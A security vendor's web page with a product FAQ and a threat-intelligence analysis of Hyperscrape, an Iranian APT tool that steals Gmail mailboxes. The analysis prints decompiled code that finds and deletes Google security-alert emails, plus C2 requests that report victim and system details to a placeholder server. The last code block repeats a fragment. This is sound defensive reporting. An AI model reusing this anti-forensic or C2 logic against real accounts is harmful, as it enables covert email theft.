Frequently Asked Questions

About Hyperscrape and Threat Analysis

What is Hyperscrape and how does it operate?

Hyperscrape is a data extraction tool attributed to Iranian APT actors. It requires valid victim account credentials and operates by spoofing the user agent to appear as an outdated browser, enabling Gmail's basic HTML view. Once authenticated, it iterates through mailbox contents, downloads messages as .eml files, marks them unread, and deletes security emails from Google. It can also request data from Google Takeout in earlier versions. The tool is written in .NET for Windows and is designed to run on the attacker's machine.

How does Hyperscrape gain access to victim email accounts?

Hyperscrape requires the attacker to have already acquired valid credentials or a hijacked authenticated session. It uses these credentials to log in, often by spoofing the user agent to trigger Gmail's basic HTML view, which simplifies data extraction.

What actions does Hyperscrape perform once inside a Gmail account?

Once inside, Hyperscrape changes the account's language to English, iterates through mailbox tabs, downloads emails as .eml files, marks them unread if they were originally unread, and deletes security-related emails from Google. It also reverts the language setting after completion.

How does Hyperscrape communicate with its command and control (C2) server?

Hyperscrape makes HTTP GET requests to its C2 server to check for a specific response ("OK") before proceeding. It sends identity information for confirmation and, upon completion, posts status and system information back to the C2. In later versions, the C2 address is obfuscated with Base64 encoding.

What anti-forensic techniques does Hyperscrape use?

Hyperscrape deletes security alert emails from Google that are generated by its activity, such as sign-in attempts, data archive requests, and other security notifications, to reduce the chance of detection by the victim.

Does Hyperscrape support Google Takeout data extraction?

Earlier versions of Hyperscrape included an option to request data from Google Takeout, allowing attackers to export user data as a downloadable archive. This feature was not automated and was removed in later versions.

What programming language is Hyperscrape written in?

Hyperscrape is written in .NET and is designed to run on Windows PCs.

How does Hyperscrape handle cookies and authentication?

Hyperscrape can accept a path to a valid cookie file via command line or through a drag-and-drop interface. It parses the cookies and inserts them into a local cache for the embedded web browser to use during authentication.

What files and logs does Hyperscrape create during operation?

Hyperscrape creates a "Download" folder adjacent to its main binary, where it saves downloaded emails as .eml files. It also writes a log file containing a count of the emails downloaded during the session.

How does Hyperscrape revert changes made to the victim's account?

After completing its data extraction, Hyperscrape reverts the account's language setting to its original value and deletes any security emails generated by its activity.

Is Hyperscrape compatible with email providers other than Gmail?

While Hyperscrape was tested in a controlled environment with a Gmail account, its functionality may differ for Yahoo! and Microsoft accounts. The tool is primarily designed for Gmail data extraction.

What command line arguments does Hyperscrape accept?

Hyperscrape accepts arguments such as the mode of operation, an identifier string, and a path to a valid cookie file. If not provided, a form prompts the operator for this information.

How does Hyperscrape handle failed authentication attempts?

If the provided cookies do not grant access, Hyperscrape displays a login page, allowing the attacker to manually enter credentials. The program waits until it detects the inbox page before proceeding with data extraction.

Does Hyperscrape send downloaded emails to the C2 server?

No, Hyperscrape does not send the downloaded emails to the C2 server. Instead, it saves them locally and only posts status and system information to the C2 upon completion.

How does Hyperscrape manage Google Takeout operations?

When performing a Google Takeout, Hyperscrape spawns a new process and uses a pipe communication channel to relay cookies and account information. The browser then navigates to the official Takeout link to request and download exported data. This feature was only present in early builds.

What are the main indicators of Hyperscrape activity?

Indicators include changes to Gmail language settings, creation of a "Download" folder with .eml files, deletion of Google security alert emails, and HTTP requests to a C2 server with specific parameters.

How does Cymulate help organizations defend against threats like Hyperscrape?

Cymulate's exposure management and security validation platform enables organizations to simulate real-world threats, including advanced persistent threats (APTs) like Hyperscrape. By continuously validating defenses across the full kill chain, Cymulate helps identify exploitable vulnerabilities, optimize security controls, and improve resilience against sophisticated attacks. Learn more about Cymulate's platform.

What types of threats can Cymulate validate?

Cymulate validates threats across the full kill chain, including phishing, malware, lateral movement, data exfiltration, and zero-day exploits, using daily updated threat templates and AI-generated attack plans. Source

How does Cymulate's immediate threats module help with emerging attacks?

Cymulate's immediate threats module is rapidly updated to reflect new attacks, allowing organizations to quickly assess their IT estate for exposure and implement remedial actions. Customers praise its speed and relevance for proactive defense. Source

What feedback have customers given about Cymulate's ease of use?

Customers consistently praise Cymulate for its intuitive design and ease of use. For example, Raphael Ferreira, Cybersecurity Manager, stated, "Cymulate is easy to implement and use—all you need to do is click a few buttons." The dashboard is described as user-friendly and effective for both technical and non-technical users. Source

Features & Capabilities

What are the key features of Cymulate's platform?

Cymulate offers continuous threat validation, exposure awareness, defensive posture optimization, attack path discovery, automated mitigation, integration with security tools, and dedicated cloud validation. These features help organizations proactively manage their cybersecurity posture. Source

How does Cymulate automate asset discovery?

Cymulate integrates with existing security and IT tools to aggregate asset data from vulnerability scans, asset inventories, and Active Directory, supporting continuous threat exposure management. Source

What types of threats and techniques does Cymulate simulate for endpoint security validation?

Cymulate simulates known malicious file samples, malicious behaviors, ransomware, worms, trojans, rootkits, DLL side-loading, and code injection to validate endpoint security controls. Source

What integrations does Cymulate support?

Cymulate integrates with a wide range of security tools, including endpoint security (e.g., CrowdStrike Falcon, Carbon Black EDR), cloud security (AWS GuardDuty, Wiz), SIEM (Splunk), vulnerability management (Rapid7 InsightVM), network security (Akamai Guardicore), and SOAR platforms. Full list of integrations

What technical documentation is available for Cymulate?

Cymulate provides technical documentation including data sheets on custom attack simulations, technology integrations, and a whitepaper on its exposure management platform. Access resources

Pricing & Plans

What is Cymulate's pricing model?

Cymulate operates on a subscription-based pricing model, customized to each organization's needs. Pricing depends on the chosen package, number of assets, and scenarios selected. For a tailored quote, schedule a demo with the Cymulate team.

Competition & Comparison

How does Cymulate compare to AttackIQ?

Cymulate offers the industry's leading threat scenario library and AI-powered capabilities for streamlined workflows and accelerated security posture. AttackIQ does not match Cymulate's innovation, threat coverage, or ease of use. Read more

How does Cymulate compare to Mandiant Security Validation?

Mandiant's platform has seen little innovation in recent years, while Cymulate continually innovates with AI and automation, expanding into exposure management as a grid leader. Read more

How does Cymulate compare to Pentera?

Pentera focuses on attack path validation but lacks the depth of exposure validation and optimization that Cymulate provides. Cymulate offers comprehensive exposure validation and optimization. Read more

How does Cymulate compare to Picus Security?

Picus is suitable for on-premise breach and attack simulation but lacks the full-kill chain coverage and cloud control validation that Cymulate provides. Cymulate offers a more complete exposure validation platform. Read more

Use Cases & Benefits

Who can benefit from using Cymulate?

Cymulate is designed for CISOs, SecOps teams, Red Teams, Vulnerability Management teams, and Detection Engineers in organizations of all sizes and industries, especially those with complex security needs and a focus on proactive threat management. Source

What business impact can customers expect from Cymulate?

Customers typically achieve a 30% improvement in threat prevention, a 52% reduction in critical exposures, a 60% increase in operational efficiency, and an 81% reduction in cyber risk within four months. Source

What are some real-world case studies demonstrating Cymulate's value?

Hertz Israel reduced cyber risk by 81% in four months, Nemours Children's Health improved detection and response, Banco PAN optimized security controls, and Nedbank increased assessment breadth and depth. See all case studies

How quickly can Cymulate be implemented?

Cymulate is designed for rapid deployment and operates in agentless mode, requiring no additional hardware or complex configuration. Customers can start running simulations almost immediately after deployment. Source

Security & Compliance

What security and compliance certifications does Cymulate hold?

Cymulate holds SOC2 Type II, ISO 27001:2013, ISO 27701, ISO 27017, and CSA STAR Level 1 certifications, demonstrating adherence to industry-leading security and privacy standards. Source

How does Cymulate ensure data security and privacy?

Cymulate hosts services in secure AWS data centers, uses TLS 1.2+ for data in transit, AES-256 for data at rest, and follows a strict Secure Development Lifecycle (SDLC) with regular third-party penetration tests. Source

Company & Vision

What is Cymulate's mission and vision?

Cymulate's mission is to empower organizations worldwide against threats and make advanced cybersecurity as simple as sending an email. Founded in 2016 by former IDF intelligence officers and cyber researchers, Cymulate aims to lead the way in exposure management and security validation. Source

What is the size and reach of Cymulate as a company?

Cymulate serves over 1,000 customers across 50 countries and operates globally with offices in eight locations. Source

Research & Community

What recent vulnerabilities has Cymulate's research team discovered?

Cymulate researchers discovered high-severity Anthropic vulnerabilities (CVE-2025-53109 & 53110). Watch the video

Is there a tool for Kerberos CNAME abuse available?

Yes, a modified version of mitm6 with Kerberos CNAME abuse capabilities is available at this GitHub repository.

Introducing Cymulate Vero AI for Agentic Cyber Defense Engineering
Learn More
New: 2026 Gartner® Market Guide for Adversarial Exposure Validation
Learn More
New Research: Exploiting Configuration Trust in AI Coding Tools
Learn More
New Case Study: How a Financial Authority Validates Cyber Resilience
Learn More

Hyperscrape - New Iranian APT data extraction tool

August 24, 2022

HYPERSCRAPE requires the victim's account credentials to run using a valid, authenticated user session the attacker has hijacked, or credentials the attacker has already acquired. It spoofs the user agent to look like an outdated browser, which enables the basic HTML view in Gmail. Once logged in, the tool changes the account's language settings to English and iterates through the contents of the mailbox, individually downloading messages as .eml files and marking them unread. After the program has finished downloading the inbox, it reverts the language back to its original settings and deletes any security emails from Google. Earlier versions contained the option to request data from Google Takeout, a feature which allows users to export their data to a downloadable archive file. The tool is written in .NET for Windows PCs and is designed to run on the attacker's machine. We tested HYPERSCRAPE in a controlled environment with a test Gmail Account, although functionality may differ for Yahoo! and Microsoft accounts. HYPERSCRAPE won't run unless in a directory with other file dependencies. When launched, the tool makes an HTTP GET request to a C2 to check for a response body of "OK'' and will terminate if it's not found. In the version tested, the C2 was unobfuscated and stored as a hardcoded string. In later versions it was obfuscated with Base64. GET http://{C2}/Index.php?Ck=OK HTTP/1.1 Host: {C2} Accept-Encoding: gzip Connection: Keep-Alive The tool accepts arguments from the command line such as the mode of operation, an identifier string, and a path string to a valid cookie file. A new form is displayed if the information is not provided via command prompt. Once provided, the data in the "Identity" field is sent to a C2 for confirmation. Again, the response is expected to be "OK". GET http://{C2}/Index.php?vubc={identity} HTTP/1.1 Host: {C2} Accept-Encoding: gzip If the cookie file path was not supplied via the command line, a new form will allow the operator to do so using drag and drop. After parsing, the cookies are inserted into a local cache used by the embedded web browser. A new folder named "Download" is created adjacent to the main binary. The browser then navigates to Gmail to begin the data collection. The user agent is spoofed so it appears like an outdated browser, which results in an error message and allows the attacker to enable the basic HTML view in Gmail. If the cookies failed to provide access to the account, a login page is displayed and the attacker can manually enter credentials to proceed, as the program will wait until it finds the inbox page. Once the attacker has logged in to the victim's account, HYPERSCRAPE checks to see if the language is set to English, changing it if not. The language is returned to its original setting when the run is finished. HYPERSCRAPE then begins iterating through all available tabs in the inbox looking for emails to download. It does the following for each email found: Clicks on the email and opens it Downloads it If the email was originally unread, marks it unread Goes back to the inbox The emails are saved with ".eml" extensions under the Downloads directory with the filename corresponding to the subject. A log file is written containing a count of the emails that were downloaded. When finished, a HTTP POST request is made to the C2 to relay the status and system information. The downloaded emails are not sent to the C2. POST http://{C2}/?Key={GUID}&Crc={Identifier} { "appName": "Gmail Downloader", "targetname": "{Email}", "HostName": "REDACTED", "srcUserIP": "REDACTED", "actionType": "First", "timeOccurrence": "05/01/2022 05:50:31 PM", "OS": "REDACTED", "OSVersion": "REDACTED", "SystemModel": "REDACTED", "SystemType": "REDACTED", "srcName": "REDACTED", "srcOrgName": "REDACTED" } The program will delete any security emails from Google generated by the attacker's activity. private bool IsThereAnyEMail() { List list = (from x in this.geckoWebBrowser.Document.GetElementsByTagName("span") where x.TextContent.StartsWith ("Security alert") || x.TextContent.StartsWith("Archive of Google data requested") || x.TextContent.StartsWith("Your Google data archive is ready") || x.TextContent.StartsWith("Your Google data is ready") || x.TextContent.StartsWith("Critical security alert") || x.TextContent.StartsWith("Access for less secure apps has been turned on") || x.TextContent.StartsWith("Review blocked sign-in attempt") || x.TextContent.StartsWith("Help us protect you: Security advice from Google") || x.TextContent.StartsWith("Access for less secure apps has been turned on") select x).ToList (); bool flag = list.Count == 0; return !flag; } Data from Google Takeout is also available upon request, but the option was only found in early builds. The functionality was not automated and it's unclear why it was removed in later versions. When conducting a Takeout, the program will spawn a new copy of itself and initialize a pipe communication channel to relay the cookies and account name, both of which are required to accomplish the Takeout. When they are received, the browser navigates to the official Takeout link to request and eventually download the exported data. public void ManageTakeOut() { string text = "PipeName"; Process process = new Process(); process.StartInfo.Arguments = string.Format("PIPE Google "{0}"", text); process.StartInfo.FileName = Process.GetCurrentProcess().MainModule.FileName; process.Start(); PipeCommunication pipeCommunication = new PipeCommunication(true, text); bool flag = false; while (!flag) { try { JsonInfo jsonInfo = pipeCommunication.Read(); switch (jsonInfo.Type) { case JsonType.GetCookies: jsonInfo.Data = this.CookieText; pipeCommunication.Write(jsonInfo); break; case JsonType.TakeOutFile: flag = true; break; case JsonType.GetUsername: while (this.OperationObject.GetUsername() == null) { Thread.Sleep(1000); } jsonInfo.Data = this.OperationObject.GetUsername(); pipeCommunication.Write(jsonInfo); break; } } catch (Exception) { bool hasExited = process.HasExited; if (hasExited) { flag = true; } } } pipeCommunication.Close(); } ; break; } } catch (Exception) { bool hasExited = process.HasExited; if (hasExited) { flag = true; } } } pipeCommunication.Close(); }